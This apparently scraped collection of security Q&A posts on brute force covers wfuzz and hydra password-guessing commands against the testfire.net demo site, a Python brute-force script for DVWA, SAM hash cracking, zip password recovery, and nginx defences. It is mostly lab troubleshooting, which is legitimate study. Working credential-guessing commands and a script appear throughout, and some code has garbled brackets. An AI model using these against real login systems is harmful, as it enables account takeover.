brute force – Why can’t Hash Suite list the username/hash pairs in my SAM file?

I recently started experimenting with Hash Suite Pro (v3.5.1). This is a Windows program that tests the security of password hashes.

A problem that I’m already running into is that Hash Suite is unable to list the username/password hash pairs in any SAM file I test it on. I’ve not even got as far as testing its cracking performance – it can’t even see the password hashes!

!(enter image description here

Does anyone have any ideas why my attempted offline attacks against a SAM file cannot even reveal the username/hash pairs? This is my first time using Hash Suite, so maybe I’m missing something basic here.

Any advice would be much appreciated!

brute force – wfuzz default number of connects in parallel per target?

In Hydra, default number of connects in parallel per target is 16 and it can be changed with -t flag.

E.g. -t 100 for 100 connection in parallel per target.

wolf@linux:~$ hydra -h | grep parallel
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
wolf@linux:~$ 

What about wfuzz? I did not see this info in it’s help menu. Is it possible to change it’s value?

wolf@linux:~$ wfuzz -h | egrep -i 'thread|parallel'
wolf@linux:~$ 

brute force – wfuzz show –hs responses when it should hide it

Test site: http://testfire.net/login.jsp

Error when login failed: Login Failed: We're sorry, but this username or password was not found in our system. Please try again.

Web Form

<form action="doLogin" method="post" name="login" id="login" onsubmit="return (confirminput(login));">
          <table>
            <tbody><tr>
              <td>
                Username:
              </td>
              <td>
                <input type="text" id="uid" name="uid" value="" style="width: 150px;">
              </td>
              <td>
              </td>
            </tr>
            <tr>
              <td>
                Password:
              </td>
              <td>
                <input type="password" id="passw" name="passw" style="width: 150px;">
                </td>
            </tr>
            <tr>
                <td></td>
                <td>
                  <input type="submit" name="btnSubmit" value="Login">
                </td>
              </tr>
          </tbody></table>
        </form>

The actual password is admin too. Therefore, I created simple passlist.txt for this purpose.

wolf@linux:~$ cat passlist.txt 
admin
pwd
pass
password
wolf@linux:~$ 

wfuzz flag

--ss/hs regex             : Show/Hide responses with the specified regex within the content

Here are few tests, but none of them really work.

wfuzz -cz file,passlist.txt –hs Failed -d “uid=admin&passw=FUZZ&btnSubmit=Login” http://testfire.net/doLogin

wolf@linux:~$ wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/doLogin

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://testfire.net/doLogin
Total requests: 4

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                          
===================================================================

000000003:   302        0 L      0 W      0 Ch        "pass"                                                                           
000000004:   302        0 L      0 W      0 Ch        "password"                                                                       
000000001:   302        0 L      0 W      0 Ch        "admin"                                                                          
000000002:   302        0 L      0 W      0 Ch        "pwd"                                                                            

Total time: 0.517212
Processed Requests: 4
Filtered Requests: 0
Requests/sec.: 7.733766

wolf@linux:~$ 

wfuzz -cz file,passlist.txt –hs Failed -d “uid=admin&passw=FUZZ&btnSubmit=Login” http://testfire.net/login.jsp

wolf@linux:~$ wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/login.jsp

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://testfire.net/login.jsp
Total requests: 4

===================================================================
ID           Response   Lines    Word     Chars       Payload                                                                          
===================================================================

000000003:   200        194 L    582 W    8519 Ch     "pass"                                                                           
000000001:   200        194 L    582 W    8519 Ch     "admin"                                                                          
000000002:   200        194 L    582 W    8519 Ch     "pwd"                                                                            
000000004:   200        194 L    582 W    8519 Ch     "password"                                                                       

Total time: 0.583132
Processed Requests: 4
Filtered Requests: 0
Requests/sec.: 6.859507

wolf@linux:~$ 

It didn’t work even thought the right user/pass combination was there.

Any idea what’s wrong in this wfuzz syntax?

hydra can do this without any problem and identified the credential accurately.

wolf@linux:~$ hydra testfire.net http-post-form 
> '/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login failed' 
> -l admin -P passlist.txt -V
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-08 08:57:36
(DATA) max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
(DATA) attacking http-post-form://testfire.net:80/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login failed
(ATTEMPT) target testfire.net - login "admin" - pass "admin" - 1 of 4 (child 0) (0/0)
(ATTEMPT) target testfire.net - login "admin" - pass "pwd" - 2 of 4 (child 1) (0/0)
(ATTEMPT) target testfire.net - login "admin" - pass "pass" - 3 of 4 (child 2) (0/0)
(ATTEMPT) target testfire.net - login "admin" - pass "password" - 4 of 4 (child 3) (0/0)
(80)(http-post-form) host: testfire.net   login: admin   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-08 08:57:39
wolf@linux:~$ 

brute force – curl to wfuzz translation

I am trying to run wfuzz to match the curl command which works, I know valid credentials but it doesn’t seem to pass it properly.

wfuzz -c -w user -w pass -b "session=cookie" --digest FUZZ:FUZ2Z "http://192.119.2.3/"

(user and pass files contain user and pass accordingly)

curl -c cookie --digest -u user:pass http://192.119.2.3

The target is running Gunicorn web server

brute force attacks – Block bruteforce attempts with nginx & cloudflare without rate limiting

So I discovered servers trying to bruteforce my API so I want to block them…but my specific scenario made it difficult to work with common solutions found on the internet.

1] I don't want to just rate limit, if any IP attempts to authenticate with the API and fail more than X times in ~6 hours I want to block them. No answers anymore at all. Not even 429 replies

2] I'm using cloudflare, so I need to use the CF IP header

3] I can't block the traffic based on iptables or similar solutions, since the only IPs that talk to my server are cloudflare IPs

4] The API generates nginx errors if the authentication fails with `2: no such file or directory` if that helps with something

Given my scenario, what are the possible solutions?

Brute Force HIGH DVWA with Python Script

I’m new using python and I’m trying to BruteForce DVWA in High Level, I found this script from https://medium.com/@dannybeton/dvwa-brute-force-tutorial-high-security-456e6ed3ae39 . But this error always pop up when I execute it. Any help is welcome,Thank U.

Error:

File “brute_force.py”, line 32, in csrf_token = soup.findAll(attrs={“name”: “user_token”})(0).get(‘value’) IndexError: list index out of range.

Whole Script:

from sys import argv
import requests
from BeautifulSoup import BeautifulSoup as Soup
# give our arguments more semantic friendly names
script, filename, success_message = argv
txt = open(filename)
# set up our target, cookie and session
url = 'http://127.0.0.1/dvwa/vulnerabilities/brute/index.php'
cookie = {'security': 'high', 'PHPSESSID':'b8dgqhbue8vdinrd87leug1no1'}
s = requests.Session()
target_page = s.get(url, cookies=cookie)
''' 
checkSuccess
@param: html (String)
Searches the response HTML for our specified success message
'''
def checkSuccess(html):
 # get our soup ready for searching
 soup = Soup(html)
 # check for our success message in the soup
 search = soup.findAll(text=success_message)

 if not search:
  success = False
 else:
  success = True
# return the brute force result
 return success
# Get the intial CSRF token from the target site
page_source = target_page.text
soup = Soup(page_source);
csrf_token = soup.findAll(attrs={"name": "user_token"})(0).get('value')
# Loop through our provided password file
with open(filename) as f:
 print 'Running brute force attack...'
 for password in f:
  # setup the payload
  payload = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}
  r = s.get(url, cookies=cookie, params=payload)
  success = checkSuccess(r.text)
  if not success:
   # if it failed the CSRF token will be changed. Get the new one
   soup = Soup(r.text)
   csrf_token = soup.findAll(attrs={"name": "user_token"})(0).get('value')
  else:
   # Success! Show the result
   print 'Password is: ' + password
   break
# We failed, bummer. 
 if not success:
  print 'Brute force failed. No matches found.'

brute force – Is it feasible to recover a zip file password consisting of about 16 digits?

A friend of mine lost the password of a zip file of her. She remembers that the password contains digits only (that is, only 0, 1, 2, 3, 4, 5, 6, 7, 8, and 9) and is 16 characters long or so. The digits in the password were chosen randomly, by randomly hitting keys. She kept her password in a TXT file, but the file is gone.

Is there any feasible way to recover the password? If so, how can we do that?

I read on the Internet that such long passwords can’t be recovered, but I think our case is special because we know that the password is digit-only. We are laywomen in mathematics and can’t estimate the amount of time needed to crack the password in our case. Should my friend simply let it go, or is it worth spending time and effort trying to recover the password?

c ++ – Simple brute force password cracker

I am trying to create my first simple brute force password generator. So far I've created a function that returns a list of passwords that my brute force algorithm is supposed to crack.
Enter the image description here

Basically, I want to call this brute_force function and enter one of the passwords in a for loop like this:
for (int i = 0; i <vector.size; i ++) {

for(std::string password : passwords){
      brute_force(password, 1);
}

For my brute_force function I want to do this in the simplest / smallest lines of code. So far I have:

std::string brute_force(std::string password, int len){
  if(password.size() == 0){
     return "bad input";
   }
  if(password.size() == 1){
   ....

What I want to do where "…" is is to generate all possible strings of length 1 and check if the password matches. If not, call the function brute_force with length 2 again and generate all alphabetic lowercase letters with length 2. I am not sure how to implement this.

Thanks in advance!

Performance – Brute Force MD5 checksum to match regex

The code starts with 128 bits of 0 (size of md5sum Checksum) then forces brutal forces to find a checksum that matches the regex (all characters of the checksum in hex are digits). I know that collisions can occur and that not all 2 ^ 128 possible checksums come out.

I know that if the code runs, it won't end soon. I will try to find out how I can change that for Loop in a parallel for Loop that uses all CPU cores.

This is one of my first (not very useful) programs in Golang. All constructive feedback is welcome.

Output:

0000000000000000000000000092FE92    14275262221639818016075488414463
000000000000000000000000009FF5EA    56052719788687373369347657641554
00000000000000000000000000BA7A1D    25521851964074241922881283516897
00000000000000000000000000E13807    19356247379454983142782955697777
00000000000000000000000000E8C976    64115693827254722796959498140064
00000000000000000000000001037BAD    68461226587668825351060559236884
0000000000000000000000000109658F    87596081213274701373126754303410
...
package main

import (
    "crypto/md5"
    "encoding/hex"
    "fmt"
    "regexp"
    "strings"
)

func main() {
    data := ()byte("x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00")

    r, _ := regexp.Compile("^(0-9){32}$")

    for {
        hash := md5.Sum(data)
        hash_hex_string := hex.EncodeToString(hash(:))

        if (r.MatchString(hash_hex_string)) {
            fmt.Printf("%X    %sn", data, strings.ToUpper(hash_hex_string))
        }

        if (!increment(data, 15)) {
            break
        }
    }
}

func increment(data ()byte, start_pos int) (bool) {
    if (start_pos < 0) {
        return false
    }

    data(start_pos)++

    if (data(start_pos) == 0) {
        return increment(data, start_pos - 1)
    }

    return true
}
```